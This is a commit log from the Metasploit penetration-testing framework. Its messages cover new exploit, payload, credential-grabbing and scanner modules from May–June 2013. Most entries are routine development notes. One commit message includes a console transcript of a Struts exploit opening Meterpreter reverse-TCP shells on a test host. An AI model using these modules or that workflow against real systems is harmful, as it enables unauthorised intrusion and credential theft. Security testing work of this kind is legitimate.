sinn3r
116e2bb418
Landing #1782 - Added Memcached Remote Denial of Service module
2013-06-03 12:30:37 -05:00
sinn3r
3d9dcbf5bd
Add a check to see if the host is down
2013-06-03 12:26:57 -05:00
xard4s
423a33b1fc
Added firefox pw decryption support
2013-06-03 13:13:59 -04:00
sinn3r
c705928052
Landing #1899 - Add OSVDB ref 85462 for esva_exec.rb
2013-06-03 10:40:31 -05:00
Steve Tornio
76faba60b7
add osvdb ref 85462
2013-06-03 06:16:43 -05:00
Steve Tornio
e612a3d017
add osvdb ref 77183
2013-06-03 05:42:56 -05:00
Dejan Lukan
217b263af7
Moved the module to different location and make it msftidy.rb compliant.
2013-06-03 10:35:10 +02:00
Dejan Lukan
df20e79375
Deleted the handle because it's not required and check() function.
2013-06-03 10:18:43 +02:00
Dejan Lukan
36f275d71a
Changed the send_request_raw into send_request_cgi function.
2013-06-03 10:06:24 +02:00
Dejan Lukan
675fbb3045
Deleted the DoS UPnP modules, because they are not relevant to the current branch.
2013-06-03 09:45:29 +02:00
Dejan Lukan
1ceed1e44a
Added corrected MiniUPnP module.
2013-06-03 09:37:04 +02:00
Dejan Lukan
d656360c24
Added CVE-2013-0230 for MiniUPnPd 1.0 stack overflow vulnerability
2013-06-03 09:37:03 +02:00
Dejan Lukan
39e4573d86
Added CVE-2013-0229 for MiniUPnPd < 1.4
2013-06-03 09:37:03 +02:00
sinn3r
e74c1d957f
Landing #1897 - Add OSVDB ref 93444 for mutiny_frontend_upload.rb
2013-06-03 02:15:35 -05:00
sinn3r
093830d725
Landing #1896 - Add OSVDB ref 82925 for symantec_web_gateway_exec.rb
2013-06-03 02:13:34 -05:00
sinn3r
57f9cc3643
Landing #1895 - Add OSVDB ref 56992 for sock_sendpage.rb
2013-06-03 02:12:23 -05:00
Steve Tornio
c2c630c338
add osvdb ref 93444
2013-06-02 21:03:44 -05:00
Steve Tornio
bc993b76fc
add osvdb ref 82925
2013-06-02 20:43:16 -05:00
Steve Tornio
ae17e9f7b5
add osvdb ref 56992
2013-06-02 18:32:46 -05:00
CG
571b62d19d
svn scanner added print_good and rport
2013-06-02 18:05:11 -04:00
sinn3r
cb33c5685f
Landing #1890 - Oracle WebCenter Content openWebdav() vulnerability
2013-06-02 12:35:40 -05:00
Steve Tornio
61c8861fcf
add osvdb ref
2013-06-02 08:33:42 -05:00
sinn3r
cc951e3412
Modifies the exploit a little for better stability
...
This patch makes sure the LFH is enabled before the CGenericElement
object is created. Triggers is also modified a little.
2013-06-02 03:02:42 -05:00
jvazquez-r7
f68d35f251
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-01 17:09:23 -05:00
jvazquez-r7
1917961904
Land #1888 , @swtornio's update for OSVDB references
2013-06-01 16:36:59 -05:00
jvazquez-r7
5939ca8ce4
Add analysis at the end of the module
2013-06-01 15:59:17 -05:00
jvazquez-r7
9be8971bb0
Add module for ZDI-13-094
2013-06-01 15:44:01 -05:00
Steve Tornio
8671ae9de7
add osvdb ref
2013-06-01 14:27:50 -05:00
Steve Tornio
80f1e98952
added osvdb refs
2013-06-01 07:04:43 -05:00
jvazquez-r7
d42ac02e3e
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-31 23:01:05 -05:00
jvazquez-r7
f8e9535c39
Add ZDI reference
2013-05-31 20:50:53 -05:00
jvazquez-r7
3a360caba1
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-31 19:03:21 -05:00
sinn3r
d679946b7f
Landing #1713 - add_sub encoder for x86 payloads
2013-05-31 18:49:08 -05:00
sinn3r
2ac0d25413
Fixes e-mail format, also a whitespace
2013-05-31 18:47:46 -05:00
Bruno Morisson
d318c1cd22
included feedback
2013-06-01 00:31:06 +01:00
Roberto Soares Espreto
d9609fb03e
Was breaking with repeated commands
2013-05-31 18:44:48 -03:00
sinn3r
90117c322c
Landing #1874 - Post API cleanup
2013-05-31 16:15:23 -05:00
sinn3r
e99401ea82
Landing #1817 - couchdb login module
2013-05-31 16:04:10 -05:00
sinn3r
a88321c700
Final touchup
2013-05-31 16:03:30 -05:00
sinn3r
483b5e204f
Missing the header
2013-05-31 16:00:36 -05:00
sinn3r
e398025a7f
I don't think what fails really matters.
2013-05-31 15:59:40 -05:00
James Lee
4f6d80c813
Land #1804 , user-settable filename for psexec
2013-05-31 13:34:52 -05:00
James Lee
5964d36c40
Fix a syntax error
...
Also uses a prettier syntax for setting the filename (ternary operators
are hard to read).
2013-05-31 13:31:36 -05:00
jvazquez-r7
48b14c09e3
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-31 01:12:46 -05:00
jvazquez-r7
146a30ec4d
Do minor cleanup for struts_include_params
2013-05-31 01:01:15 -05:00
jvazquez-r7
a7a754ae1f
Land #1870 , @Console exploit for Struts includeParams injection
2013-05-31 00:59:33 -05:00
Tod Beardsley
9c771435f2
Touchup on author credit
2013-05-30 16:13:40 -05:00
Tod Beardsley
dc014ede36
Land #1821 , x64_reverse_https payload
2013-05-30 16:09:33 -05:00
jvazquez-r7
70037fdbed
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-30 15:02:34 -05:00
jvazquez-r7
d0489b5d1e
Delete some commas
2013-05-30 14:25:53 -05:00
jvazquez-r7
6abb591428
Do minor cleanup for lianja_db_net
2013-05-30 14:25:05 -05:00
jvazquez-r7
38e5c2bed2
Land #1877 , @zeroSteiner's exploit for Lianja SQL
2013-05-30 14:23:45 -05:00
Tod Beardsley
67128a3841
Land #1821 , x64_reverse_https stagers
2013-05-30 13:55:13 -05:00
Console
eb4162d41b
boolean issue fix
2013-05-30 18:15:33 +01:00
Console
5fa8ecd334
removed magic number 109
...
now calculated from the actual length of all static URL elements
2013-05-30 17:40:43 +01:00
Spencer McIntyre
70e1379338
Use msvcrt in ropdb for stability.
2013-05-30 11:13:22 -04:00
Console
47524a0570
converted request params to hash merge operation
2013-05-30 15:36:01 +01:00
Console
51879ab9c7
removed unnecessary lines
2013-05-30 15:15:10 +01:00
Console
abb0ab12f6
Fix msftidy compliance
2013-05-30 13:10:24 +01:00
Console
5233ac4cbd
Progress bar instead of message spam.
2013-05-30 13:08:43 +01:00
Bruno Morisson
d03379f1c6
changed 2 vprint_error to print_error
2013-05-30 11:54:42 +01:00
Console
fb388c6463
Chunk length is now "huge" for POST method
...
minor changes to option text and changed HTTPMETHOD to an enum.
2013-05-30 11:30:24 +01:00
Console
ab6a2a049b
Fix issue with JAVA meterpreter failing to work.
...
Was down to the chunk length not being set correctly.
Still need to test against windows.
```
msf exploit(struts_include_params) > show targets
Exploit targets:
Id Name
-- ----
0 Windows Universal
1 Linux Universal
2 Java Universal
msf exploit(struts_include_params) > set target 1
target => 1
msf exploit(struts_include_params) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit
[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.0.1
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.1:38512) at 2013-05-30 10:37:54 +0100
[+] Deleted /tmp/57mN5N
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux localhost.localdomain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 (x86_64)
Architecture : x86_64
Meterpreter : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.0.1 - Meterpreter session 5 closed. Reason: User exit
msf exploit(struts_include_params) > set target 2
target => 2
msf exploit(struts_include_params) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit
[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending stage (30246 bytes) to 192.168.0.1
[*] Meterpreter session 6 opened (192.168.0.2:4444 -> 192.168.0.1:38513) at 2013-05-30 10:38:27 +0100
[!] This exploit may require manual cleanup of: z4kv.jar
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux 2.6.32-358.2.1.el6.x86_64 (amd64)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```
2013-05-30 10:35:29 +01:00
Console
d70526f4cc
Renamed as per suggestion
2013-05-30 09:29:26 +01:00
jvazquez-r7
3361a660ba
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-29 22:01:36 -05:00
Roberto Soares Espreto
00debd01c6
Listen for a connection and spawn a command shell via AWK
2013-05-29 21:22:49 -03:00
Roberto Soares Espreto
d4a864c29f
Creates an interactive shell via AWK (reverse)
2013-05-29 21:19:08 -03:00
Roberto Soares Espreto
07203568bd
Performed changes to the correct operation of the module.
2013-05-29 20:50:28 -03:00
jvazquez-r7
07c99f821e
Land #1879 , @dcbz ARM stagers
2013-05-29 17:43:37 -05:00
Bruno Morisson
612eabd21a
added sap_router_portscanner module
2013-05-29 23:36:53 +01:00
jvazquez-r7
9d91596e46
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-29 16:21:32 -05:00
jvazquez-r7
f76a50ae38
Land #1881 , @todb's fix for Redmine Bug 7991
2013-05-29 16:17:18 -05:00
jvazquez-r7
1d0c4151b7
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-29 15:29:26 -05:00
Tod Beardsley
e7a1f06fbc
Modules shouldn't be +x
2013-05-29 15:11:35 -05:00
jvazquez-r7
7c41e239b4
Fix author name
2013-05-29 14:19:10 -05:00
jvazquez-r7
52aae8e04c
Add small fixes for stagers
2013-05-29 14:01:59 -05:00
Tod Beardsley
10d8bebe73
Start with a random username to test 401 codes
...
SeeRM #7991
While this fixes the specific case of tomcat_mgr_login, it doesn't
address the general case where modules are attempting to test code 401
responses in order to determine if bruteforcing should continue.
2013-05-29 12:36:28 -05:00
jvazquez-r7
aa688c4313
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-29 10:47:04 -05:00
Samuel Huckins
f0e3b0c124
Merge pull request #1836 from dmaloney-r7/bug/anyuser_anypass_http
...
Verified MSF specs passing, Pro on develop functional tests working (ran Bruteforce, saw normal and verbose output concerning that bruteforce was skipped for such a case and why, verified no cred saved with 'anyuser' user).
2013-05-29 07:44:18 -07:00
Console
7c38324b76
Considered using the bourne stager.
...
Decided against it as current implementation of JAVA base64
encode/decode appears to be more OS agnostic and robust.
Tidied up a few lines of code and added some more output.
2013-05-29 14:21:23 +01:00
Spencer McIntyre
c3ab1ed2a5
Exploit module for Lianja SQL 1.0.0RC5.1
2013-05-29 08:48:41 -04:00
Console
ec315ad50d
Modified URI handling to make use of target_uri and vars_get/post.
...
Added support for both GET and POST methods as both are vulnerable to
this exploit.
2013-05-29 12:56:34 +01:00
dcbz
2c0f0f5f04
Changed reverse payload as suggested.
2013-05-28 21:52:16 -05:00
dcbz
07c3565e3c
Made changes as suggested, forgot to remove exit() after testing was complete.
2013-05-28 21:31:36 -05:00
jvazquez-r7
6401d557fd
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-28 19:57:16 -05:00
sinn3r
ed5b8895bb
Fixes smart_migrate for a TypeError bug
...
Bug is: TypeError can't convert Rex::RuntimeError into String
[SeeRM: #7984 ]
2013-05-28 18:45:49 -05:00
sinn3r
63694a6c87
Landing #1875 - Also remove *.ts.rb files
2013-05-28 17:29:02 -05:00
Console
b39531cea6
Added references
2013-05-28 23:15:10 +01:00
Tod Beardsley
14c4dbcf8c
Also remove *.ts.rb files
...
On the heels of #1862 , this gets rid of the "test suites" that bound
together all the old unit tests.
2013-05-28 17:05:44 -05:00
jvazquez-r7
a486fff9a4
Land #1872 , @wchen-r7's improvement of cold_fusion_version
2013-05-28 16:35:45 -05:00
jvazquez-r7
96888455a7
Add new signature for CF9
2013-05-28 16:04:08 -05:00
James Lee
f3ff5b5205
Factorize and remove includes
...
Speeds up compilation and removes dependency on bionic source
2013-05-28 15:46:06 -05:00
jvazquez-r7
66ea59b03f
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-28 15:22:46 -05:00
sinn3r
deea66b76f
Landing #1871 - fix an undefined variable bug in the DTP module
2013-05-28 15:13:20 -05:00
sinn3r
b9969a8b2b
Landing #1855 - Updates for coldfusion_pwd_props for CF9 by ringt
2013-05-28 14:43:09 -05:00
sinn3r
0ecffea66f
Updates fingerprint() for CF10
2013-05-28 14:42:11 -05:00
sinn3r
a6a46f82bb
Updates the description a little bit
2013-05-28 14:31:56 -05:00
sinn3r
e4e5edc619
Looks like we don't need to check MD5, let's keep it that way then.
2013-05-28 14:31:15 -05:00
sinn3r
8ab90e657c
Adds a check for Cold Fusion 10
2013-05-28 14:21:29 -05:00
Spencer McIntyre
3857507d73
fix an undefined variable bug in the DTP module
2013-05-28 14:52:58 -04:00
Console
7b43117d87
Added RCE for Struts versions earlier than 2.3.14.2
...
Heavily based upon my previous module for parameters
interceptor based RCE.
Tested against the POC given at the reference website successfully.
2013-05-28 18:26:57 +01:00
James Lee
9843dc4cb4
Land #1708 , android meterpreter
...
Conflicts:
data/meterpreter/ext_server_stdapi.jar
2013-05-28 12:19:45 -05:00
sinn3r
d16d316658
Fixes mssql_findandsampledata & ms11_006_creat esizeddibsection
...
[FixRM:7987]
[FixRM:7986]
2013-05-28 11:15:17 -05:00
sinn3r
73aa14cb91
Landing #1868 - IBM SPSS SamplePower 3.0 module (CVE-2012-5946)
2013-05-28 11:02:21 -05:00
Tod Beardsley
75d6c8079a
Spelling, whitespace
...
Please be sure to run msftidy.rb on new modules. Thanks!
2013-05-28 10:03:37 -05:00
Matt Andreko
5695994432
Added module to enumerate Canon printer Wifi settings
2013-05-27 18:02:37 -04:00
jvazquez-r7
094a5f1b18
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-26 16:03:33 -05:00
jvazquez-r7
e678b2c5d8
Add module for CVE-2012-5946
2013-05-26 00:21:20 -05:00
darknight007
57b7e4ec44
Update ms11_006_createsizeddibsection.rb
2013-05-25 13:14:41 +06:00
darknight007
6f2ddb3704
Update mssql_findandsampledata.rb
2013-05-25 11:33:57 +05:00
sinn3r
e169ccab4f
Landing #1862 - Remove inline unit tests
2013-05-23 22:19:29 -05:00
Matt Andreko
ea7805d3c8
Fixed a bug in the HSTS module around null headers
2013-05-23 15:02:39 -04:00
Tod Beardsley
05916c079e
Inline unit tests are so last decade
...
Aside from codebase-wide changes, nearly all of these tests haven't been
touched since before 2010, and there is no effort to maintain this style
of testing. We've moved on to (correctly) seperating out our tests from
our codebase.
2013-05-23 12:41:14 -05:00
jvazquez-r7
d5cf6c1fbc
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-23 12:37:54 -05:00
sinn3r
81ad280107
Landing #1856 - CVE-2013-0758 Firefox <= 17.0.1 + Flash RCE
...
Chained exploit using CVE-2013-0758 and CVE-2013-0757
2013-05-23 12:21:10 -05:00
jvazquez-r7
8e41ae3454
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-23 10:59:40 -05:00
sinn3r
8680aa8952
Landing #1857 - MS12-020 off-by-one fix
2013-05-22 22:57:08 -05:00
sinn3r
67861794f6
Fix automatic payload selection
2013-05-22 22:37:18 -05:00
jvazquez-r7
23bc11c7e0
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-22 15:15:58 -05:00
sinn3r
23fe3146dc
Extra print_status I don't want
2013-05-22 14:38:30 -05:00
jvazquez-r7
bfcd86022d
Add code cleanup for nginx_chunked_size.
2013-05-22 14:37:42 -05:00
sinn3r
0e6576747a
Fix target selection probs, and swf path
2013-05-22 14:34:00 -05:00
jvazquez-r7
0dee5ae94d
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-22 12:54:44 -05:00
LinuxGeek247
81b690ae4b
Initial check in of nginx module
2013-05-22 13:52:00 -04:00
sinn3r
ecb9d1d7fa
Landing #1848 - AdobeCollabSync Buffer Overflow on Adobe Reader X
2013-05-22 12:24:42 -05:00
John Sherwood
d028f52dbd
Fix broken ms12-020 vulnerability detection
...
The previous version of the script had an off-by-one error that prevented
proper detection of the vulnerability. Changes made in this revision
include:
- Correction of the off-by-one error
- Use of match instead of == to check for valid RDP connection
- Change of the channel requests to use IDs actually provided by
the responses from the server
2013-05-22 00:08:25 -04:00
Joe Vennix
aae4768563
Fix whitespace issues from msftidy.
2013-05-21 14:31:36 -05:00
Joe Vennix
eaeb10742a
Add some comments and clean some things up.
2013-05-21 14:01:14 -05:00
Joe Vennix
978aafcb16
Add DEBUG option, pass args to .encoded_exe().
2013-05-21 14:01:14 -05:00
Joe Vennix
ee8a97419c
Add some debug print calls to investigate Auto platform selection.
2013-05-21 14:01:13 -05:00
Joe Vennix
60fdf48535
Use renegerate_payload(cli, ...).
2013-05-21 14:01:13 -05:00
ringt
54eeb8f000
Adding new version...old version does not work in windows, doesnt fingerprint, and a few other minor things
2013-05-21 13:13:21 -05:00
dmaloney-r7
ee28a3a8d7
Update http_login.rb
...
add parens around conditional to make bikeshed prettier
2013-05-21 11:28:23 -05:00
jvazquez-r7
367e789047
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-20 18:49:38 -05:00
jvazquez-r7
53cb493bc9
Fix @jlee-r7's feedback
2013-05-20 18:44:21 -05:00
dcbz
a53ab4cff9
Moved dupandexecve.rb to shell.rb due to pull request coments.
2013-05-20 17:05:57 -05:00
James Lee
f4498c3916
Remove $Id tags
...
Also adds binary coding magic comment to a few files
2013-05-20 16:21:03 -05:00
jvazquez-r7
94bc3bf8eb
Fix msftidy warning
2013-05-20 10:35:59 -05:00
jvazquez-r7
395aac90c2
Do minor cleanup for linksys_wrt160nv2_apply_exec
2013-05-20 10:34:39 -05:00
jvazquez-r7
08b2c9db1e
Land #1801 , @m-1-k-3's linksys wrt160n exploit
2013-05-20 10:33:44 -05:00
jvazquez-r7
8235ba6316
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-20 08:48:42 -05:00
m-1-k-3
1a904ccf7d
tftp download
2013-05-19 20:37:46 +02:00
jvazquez-r7
dfa19cb46d
Do minor cleanup for dlink_dir615_up_exec
2013-05-19 12:43:01 -05:00
jvazquez-r7
348705ad46
Land #1800 , @m-1-k-3's exploit for DLINK DIR615
2013-05-19 12:42:02 -05:00
m-1-k-3
f3a2859bed
removed user,pass in request
2013-05-19 18:50:12 +02:00
m-1-k-3
aee5b02f65
tftp download check
2013-05-19 18:45:01 +02:00
m-1-k-3
4816925f83
feeback included
2013-05-19 16:19:45 +02:00
jvazquez-r7
85ceaa1a62
Add module for CVE-2013-2730
2013-05-18 12:44:24 -05:00
dcbz
9c0814505a
Added reverse stager.
2013-05-17 21:52:10 -05:00
dcbz
14d5111b37
Added a sample stage + updated bind stager.
2013-05-17 21:03:03 -05:00
dcbz
ad95eff9d4
added bind_tcp.rb
2013-05-17 12:09:45 -05:00
Dejan Lukan
945dde3389
Added CVE-2013-0229 for MiniUPnPd < 1.4
2013-05-17 13:58:32 +02:00
jvazquez-r7
0f3b13e21d
up to date
2013-05-16 15:02:41 -05:00
James Lee
42d8173d17
Land #1837 , broken references
2013-05-16 14:32:46 -05:00
James Lee
3009bdb57e
Add a few more references for those without
2013-05-16 14:32:02 -05:00
jvazquez-r7
d9bdf3d52e
Do final cleanup for sap_smb_relay
2013-05-16 14:25:10 -05:00
jvazquez-r7
9dd582c526
Land #1656 , @nmonkee's module for SMB Relay attacks against SAP
2013-05-16 14:23:39 -05:00
h0ng10
ccef6e12d2
changed to array in array
2013-05-16 19:03:47 +02:00
h0ng10
460542506d
changed to array
2013-05-16 19:01:20 +02:00
h0ng10
378f0fff5b
added missing comma
2013-05-16 18:59:46 +02:00
jvazquez-r7
947735bd25
up to date
2013-05-16 11:26:50 -05:00
jvazquez-r7
c21035c0b9
Add final cleanup for sap_ctc_verb_tampering_user_mgmt
2013-05-16 10:42:09 -05:00
jvazquez-r7
7823df0478
Change module filename
2013-05-16 10:41:25 -05:00
jvazquez-r7
f3f0272395
Land #1652 , @nmonkee's SAP CTC Verb Tampering for User Mgmt module
2013-05-16 10:40:17 -05:00
David Maloney
4503a7af50
Don't save creds of anyuser:anypass
...
If http accepts any user and any pass, it's not a real auth
there is no reason to create cred objects for this.
These creds have been confusing our users
2013-05-16 10:25:32 -05:00
nmonkee
11286630d5
modifications to CLBA_ SOAP requests to fix XML kernel processor error
2013-05-16 11:24:29 +01:00
Joe Vennix
1a5c747bb9
Update description.
2013-05-15 23:52:51 -05:00
Joe Vennix
178a43a772
Whitespace tweaks and minor bug fix. Wrong payloads still run.
2013-05-15 23:47:04 -05:00
Joe Vennix
f4b6db8c49
Tweak whitespace.
2013-05-15 23:35:59 -05:00
Joe Vennix
a7d79e2a51
Oops, don't cache payload_filename.
2013-05-15 23:34:14 -05:00
Joe Vennix
4d5c4f68cb
Initial commit, works on three OSes, but automatic mode fails.
2013-05-15 23:32:02 -05:00
jvazquez-r7
8a18853dfa
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-15 21:35:59 -05:00
jvazquez-r7
c82bb73347
Avoid super verbose output
2013-05-15 17:45:37 -05:00
jvazquez-r7
cb24d3ddae
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-15 11:13:29 -05:00
James Lee
61afe1449e
Landing #1275 , bash cmdstager
...
Conflicts:
lib/rex/exploitation/cmdstager.rb
Conflict was just the $Id$ tag, which is no longer used anyway.
2013-05-15 10:44:05 -05:00
James Lee
2504aa4550
Land #1812 , mailvelope chrome extension key grabber
2013-05-15 10:10:36 -05:00
jvazquez-r7
011b0bb741
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-15 09:07:47 -05:00
jvazquez-r7
649a8829d3
Add modules for Mutiny vulnerabilities
2013-05-15 09:02:25 -05:00
jvazquez-r7
352a7afcd6
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-14 22:29:24 -05:00
jvazquez-r7
c410a54d44
Merge SAP SMB Relay abuses in just one module
2013-05-14 20:53:08 -05:00
jvazquez-r7
357ef001cc
Change module filename
2013-05-14 20:52:33 -05:00
sinn3r
e1111928c2
Adds patch info for ie_cgenericelement_uaf
...
This one is MS13-038
2013-05-14 14:55:02 -05:00
jvazquez-r7
500ef5df13
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-14 14:49:05 -05:00
jvazquez-r7
83f1418f28
up to date
2013-05-14 14:48:58 -05:00
sinn3r
41e9f35f3f
Landing #1819 - Convert sap_mgmt_con_osexec_payload to multi platform
2013-05-14 14:48:16 -05:00
sinn3r
5e925f6629
Description update
2013-05-14 14:20:27 -05:00
jvazquez-r7
07b3355a17
Merge branch 'sap_ctc_verb_tampering_add_user_and_add_role' of https://github.com/nmonkee/metasploit-framework
2013-05-14 13:47:39 -05:00
jvazquez-r7
b9caa23b30
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-14 12:26:23 -05:00
Roberto Soares Espreto
3d7c9a9a06
Changed the path from TARGETURI
2013-05-14 00:11:40 -03:00
jvazquez-r7
42cfa72f81
Update data after test kloxo 6.1.12
2013-05-13 19:09:06 -05:00
jvazquez-r7
58f2373171
Added module for EDB 25406
2013-05-13 18:08:23 -05:00
Borja Merino
eb46b09708
Timeout condition change
2013-05-14 00:35:42 +02:00
sinn3r
5e997aaf80
Landing #1816 - lists essential information about CouchDB
2013-05-13 16:46:20 -05:00
sinn3r
cba045a604
Make additional changes to the module
2013-05-13 16:42:33 -05:00
Tod Beardsley
e3384439ed
64-bit, not '64 bits'
2013-05-13 15:40:17 -05:00
jvazquez-r7
1d755eb705
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-13 12:49:32 -05:00
jvazquez-r7
e71e0c1c28
Land #1822 , @wchen-r7's module for Coldfusion HTP disclosed exploit
2013-05-13 12:41:54 -05:00
jvazquez-r7
f04ca17bb9
Fix default action
2013-05-13 11:56:02 -05:00
jvazquez-r7
5b64379553
Add Coldfusion 9 target, OSVDB ref and review
2013-05-13 11:55:11 -05:00
sinn3r
60299c2adb
Add EDB-25305 - That ColdFusion 10 sub0 0day stuff
...
This is just an aux module that extract passwords from
password.properties. Yes, this can leverage a shell too, but
obviously that's best implemented in #1737 , or as a new exploit.
We'll see.
2013-05-12 21:23:53 -05:00
agix
6db1fea6b9
create x64_reverse_https stagers
2013-05-13 01:41:56 +02:00
jvazquez-r7
51a532e8b4
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-12 17:39:58 -05:00
jvazquez-r7
feac292d85
Clean up for dlink_dsl320b_password_extractor
2013-05-12 17:35:59 -05:00
jvazquez-r7
ee46771de5
Land #1799 , @m-1-k-3's auth bypass module for Dlink DSL320
2013-05-12 17:34:08 -05:00
jvazquez-r7
01ce751c51
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-12 17:08:14 -05:00
root
b8826396ee
Cosmetic changes
2013-05-12 23:03:28 +02:00
m-1-k-3
981cc891bc
description
2013-05-12 20:07:32 +02:00
root
ba5d6fc259
Added post module to get a MITM through a pptp tunnel
2013-05-12 16:27:43 +02:00
jvazquez-r7
ce594a3ba2
Deprecate modules/exploits/windows/http/sap_mgmt_con_osexec_payload
2013-05-12 08:46:40 -05:00
jvazquez-r7
495f1e5013
Add multi platform module for SAP MC exec exploit
2013-05-12 08:46:00 -05:00
sinn3r
7fcf20201b
Ranking should be the same (to GoodRanking)
2013-05-11 09:19:25 -05:00
Roberto Soares Espreto
a94d078bfd
Added the statement return to condition: if res.nil?
2013-05-11 00:59:05 -03:00
Roberto Soares Espreto
18ee9af59f
Added couchdb_enum.rb to list essential information about CouchDB
2013-05-10 23:18:48 -03:00
Roberto Soares Espreto
7a7f4a1727
Added couchdb_login.rb to try to brute-force credentials of CouchDB
2013-05-10 23:16:11 -03:00
James Lee
55fc1458de
Simplify and clean up some
...
I'd really love to make this work on Linux as well, since it's really
just a file grabber/parser. Unfortunately, the Post API for enumerating
users and homedirs isn't great for cross-platform stuff like this.
A few small changes, all verified on Windows 7:
* Reuse the key storing code instead of copy-paste with minor changes
* Use binary mode when opening the stored prefs
* Don't bother checking for incognito since we're using `steal_token`
anyway
* Check for existence of directories instead of guessing based on OS
match
2013-05-10 16:58:35 -05:00
Rob Fuller
84ff72eb92
use file_exist? instead of fs.file.stat
2013-05-10 11:17:42 -04:00
Rob Fuller
25f7af43b4
use gsub instead of split/join
2013-05-10 11:12:56 -04:00
jvazquez-r7
891e36c947
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-09 17:47:35 -05:00
jvazquez-r7
d37d211ecc
Fix short escape sequences error
2013-05-09 17:29:55 -05:00
jvazquez-r7
4147a27216
Land #1667 , @nmonkee's sap_soap_rfc_sxpg_command_exec exploit
2013-05-09 17:00:11 -05:00
jvazquez-r7
6842432abb
Land #1678 , @nmonkee's sap_soap_rfc_sxpg_call_system_exec exploit
2013-05-09 16:52:01 -05:00
jvazquez-r7
cf05602c6f
Land #1661 , @nmonkee's sap_soap_rfc_eps_get_directory_listing module
2013-05-09 16:46:13 -05:00
jvazquez-r7
b18a98259b
Modify default rport
2013-05-09 16:24:54 -05:00
jvazquez-r7
3e1d1a3f98
Land #1659 , @nmonkee's sap_soap_rfc_eps_delete_file module
2013-05-09 16:22:54 -05:00
nmonkee
53c08cd60f
fix incorrect printing typo
2013-05-09 21:37:04 +01:00
jvazquez-r7
ca41d859a9
up to date
2013-05-09 13:00:10 -05:00
jvazquez-r7
e711474654
Merge branch 'sap_soap_xmla_bw_smb_relay_' of https://github.com/nmonkee/metasploit-framework
2013-05-09 12:37:46 -05:00
jvazquez-r7
823d89935a
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-09 12:36:43 -05:00
Rob Fuller
95b0d4e5ec
move filename init up to remove dup code
...
as suggested by @jlee-r7
2013-05-09 13:29:21 -04:00
Rob Fuller
2f543d3080
extension and pref parsing
2013-05-09 13:23:28 -04:00
sinn3r
9043eeda66
A slight change for stability
...
While updating ie_cgenericelement_uaf earlier today, I noticed the
changes made it a tiny bit less stable. Juan's test log in #1809
also kinda shows that (with the first attempt failing), so I decided
to go back and move the string crafting part, that way between
CollectGarbage() and the overwrite, there is less noise, and hopefully
more stable. I did a few tests, seems better.
2013-05-08 20:02:55 -05:00
jvazquez-r7
866fa167ab
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-08 16:29:52 -05:00
jvazquez-r7
bdd2287daf
Land #1809 , @wchen-r7's modification for ie_cgenericelement_uaf
2013-05-08 16:21:11 -05:00
sinn3r
0e51042a01
Landing #1808 - ERS Viewer 2011 bof (CVE-2013-0726)
2013-05-08 15:51:46 -05:00
sinn3r
9a1400a75b
Forgot to remove this print_warning
2013-05-08 15:44:04 -05:00
sinn3r
075f6e8d45
Updates ROP chain and mstime_malloc usage
2013-05-08 15:42:45 -05:00
Tod Beardsley
4c75354a6a
Land #1786 , request_cgi instead of request_raw
...
Also some other small changes to modules, such as sensible defaults for
options.
2013-05-08 14:58:04 -05:00
sinn3r
c7609ac7d1
Initial update
2013-05-08 14:24:52 -05:00
jvazquez-r7
1aa80cd35e
Add module for CVE-2013-0726
2013-05-08 13:48:48 -05:00
jvazquez-r7
e939de583c
Clean up and multi platform support for sap_soap_rfc_sxpg_command_exec
2013-05-07 22:46:39 -05:00
jvazquez-r7
5f59d9f723
Move sap_soap_rfc_sxpg_command_exec to multi dir
2013-05-07 22:46:04 -05:00
jvazquez-r7
ab60e0bfb7
Fix print message
2013-05-07 22:41:15 -05:00
jvazquez-r7
